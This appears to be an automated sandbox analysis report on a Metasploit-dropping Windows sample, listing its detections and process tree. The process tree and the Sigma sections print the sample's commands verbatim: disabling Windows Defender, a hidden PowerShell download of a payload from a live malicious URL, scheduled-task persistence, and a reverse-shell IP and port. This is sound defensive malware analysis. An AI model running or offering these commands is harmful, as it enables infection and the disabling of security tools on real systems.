Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WO.exe

Overview

General Information

Sample name:WO.exe
Analysis ID:1580052
MD5:7176b040816932541eb9c2b91d90b29b
SHA1:137a9c4620366caff2a1d1c297b6ae8c6d28761d
SHA256:db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
Tags:exeuser-James_inthe_box
Infos:

Detection

Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
Yara detected Powershell download and execute
AI detected suspicious sample
Disable Windows Defender real time protection (registry)
Disables Windows Defender (via service or powershell)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Windows Service Tampering
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WO.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\WO.exe" MD5: 7176B040816932541EB9C2B91D90B29B)
    • cmd.exe (PID: 7068 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7164 cmdline: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2316 cmdline: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • reddit.exe (PID: 6800 cmdline: "C:\Users\user\AppData\Local\Temp\reddit.exe" MD5: 23544090C6D379E3ECA7343C4F05D4D2)
      • attrib.exe (PID: 5480 cmdline: attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • schtasks.exe (PID: 1880 cmdline: schtasks /query /TN "RunRedditLogon" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6328 cmdline: schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6276 cmdline: schtasks /query /TN "RunRedditMinute" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1544 cmdline: schtasks /create /tn "RunRedditMinute" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • sc.exe (PID: 2196 cmdline: sc config WinDefend start= disabled MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • net.exe (PID: 5244 cmdline: net stop WinDefend MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net1.exe (PID: 2004 cmdline: C:\Windows\system32\net1 stop WinDefend MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
      • reg.exe (PID: 6184 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 6352 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • WO.exe (PID: 2476 cmdline: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe MD5: 7176B040816932541EB9C2B91D90B29B)
    • cmd.exe (PID: 1836 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2004 cmdline: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4476 cmdline: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • reddit.exe (PID: 5308 cmdline: "C:\Users\user\AppData\Local\Temp\reddit.exe" MD5: 23544090C6D379E3ECA7343C4F05D4D2)
      • attrib.exe (PID: 2664 cmdline: attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • schtasks.exe (PID: 2472 cmdline: schtasks /query /TN "RunRedditLogon" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6972 cmdline: schtasks /query /TN "RunRedditMinute" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • sc.exe (PID: 6228 cmdline: sc config WinDefend start= disabled MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • net.exe (PID: 6992 cmdline: net stop WinDefend MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net1.exe (PID: 3468 cmdline: C:\Windows\system32\net1 stop WinDefend MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
      • reg.exe (PID: 6152 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 4488 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • WO.exe (PID: 6100 cmdline: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe MD5: 7176B040816932541EB9C2B91D90B29B)
    • cmd.exe (PID: 6272 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6324 cmdline: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6104 cmdline: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • reddit.exe (PID: 7108 cmdline: "C:\Users\user\AppData\Local\Temp\reddit.exe" MD5: 23544090C6D379E3ECA7343C4F05D4D2)
      • attrib.exe (PID: 4076 cmdline: attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • schtasks.exe (PID: 6208 cmdline: schtasks /query /TN "RunRedditLogon" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1700 cmdline: schtasks /query /TN "RunRedditMinute" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • sc.exe (PID: 4476 cmdline: sc config WinDefend start= disabled MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • net.exe (PID: 6176 cmdline: net stop WinDefend MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net1.exe (PID: 6996 cmdline: C:\Windows\system32\net1 stop WinDefend MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
      • reg.exe (PID: 3312 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 2316 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • WO.exe (PID: 6156 cmdline: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe MD5: 7176B040816932541EB9C2B91D90B29B)
    • cmd.exe (PID: 4600 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6352 cmdline: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4996 cmdline: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • reddit.exe (PID: 5744 cmdline: "C:\Users\user\AppData\Local\Temp\reddit.exe" MD5: 23544090C6D379E3ECA7343C4F05D4D2)
      • attrib.exe (PID: 6344 cmdline: attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • schtasks.exe (PID: 6416 cmdline: schtasks /query /TN "RunRedditLogon" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6944 cmdline: schtasks /query /TN "RunRedditMinute" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup

Malware Configuration

Threatname: Metasploit

{"Type": "Metasploit Connect", "IP": "147.185.221.23", "Port": 1121}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapWindows_Trojan_Metasploit_4a1c4da8Identifies Metasploit 64 bit reverse tcp shellcode.unknown
  • 0x4141:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          C:\Users\user\AppData\Local\Temp\reddit.exeJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
              00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_4a1c4da8Identifies Metasploit 64 bit reverse tcp shellcode.unknown
              • 0xd8:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08
              00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
                00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_4a1c4da8Identifies Metasploit 64 bit reverse tcp shellcode.unknown
                • 0xd8:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08
                0000001B.00000002.2895620558.0000000000401000.00000020.00000001.01000000.00000005.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
                  Click to see the 23 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  53.0.reddit.exe.400000.0.unpackJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
                    53.0.reddit.exe.400000.0.unpackJoeSecurity_MetasploitPayloadYara detected Metasploit PayloadJoe Security
                      53.0.reddit.exe.400000.0.unpackWindows_Trojan_Metasploit_4a1c4da8Identifies Metasploit 64 bit reverse tcp shellcode.unknown
                      • 0x3a39:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08
                      28.2.reddit.exe.400000.0.unpackJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
                        28.2.reddit.exe.400000.0.unpackJoeSecurity_MetasploitPayloadYara detected Metasploit PayloadJoe Security
                          Click to see the 19 entries

                          Other

                          SourceRuleDescriptionAuthorStrings
                          amsi64_2316.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                            amsi64_6104.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                              amsi64_4476.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                amsi64_4996.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: PowerShell DownloadFile
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", ProcessId: 2316, ProcessName: powershell.exe
                                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", CommandLine: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", ProcessId: 7164, ProcessName: powershell.exe
                                  Sigma detected: Powershell Defender Disable Scan Feature
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", CommandLine: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", ProcessId: 7164, ProcessName: powershell.exe
                                  Sigma detected: Suspicious Script Execution From Temp Folder
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", ProcessId: 2316, ProcessName: powershell.exe
                                  Sigma detected: Suspicious Windows Service Tampering
                                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: net stop WinDefend, CommandLine: net stop WinDefend, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: net stop WinDefend, ProcessId: 5244, ProcessName: net.exe
                                  Sigma detected: PowerShell Download Pattern
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", ProcessId: 2316, ProcessName: powershell.exe
                                  Sigma detected: PowerShell Web Download
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", ProcessId: 2316, ProcessName: powershell.exe
                                  Sigma detected: Suspicious Schtasks From Env Var Folder
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f, CommandLine: schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f, ProcessId: 6328, ProcessName: schtasks.exe
                                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", ProcessId: 2316, ProcessName: powershell.exe
                                  Sigma detected: Net.exe Execution
                                  Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net stop WinDefend, CommandLine: net stop WinDefend, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: net stop WinDefend, ProcessId: 5244, ProcessName: net.exe
                                  Sigma detected: Non Interactive PowerShell Process Spawned
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", CommandLine: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", ProcessId: 7164, ProcessName: powershell.exe
                                  Sigma detected: Stop Windows Service Via Net.EXE
                                  Source: Process startedAuthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: net stop WinDefend, CommandLine: net stop WinDefend, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: net stop WinDefend, ProcessId: 5244, ProcessName: net.exe

                                  Suricata Signatures

                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-12-23T19:54:05.154586+010028202081A Network Trojan was detected185.151.51.214443192.168.2.449730TCP

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Antivirus detection for URL or domain
                                  Source: https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exeAvira URL Cloud: Label: malware
                                  Antivirus detection for dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeAvira: detection malicious, Label: TR/Patched.Gen2
                                  Found malware configuration
                                  Source: 00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "IP": "147.185.221.23", "Port": 1121}
                                  Multi AV Scanner detection for dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeReversingLabs: Detection: 89%
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeReversingLabs: Detection: 57%
                                  Multi AV Scanner detection for submitted file
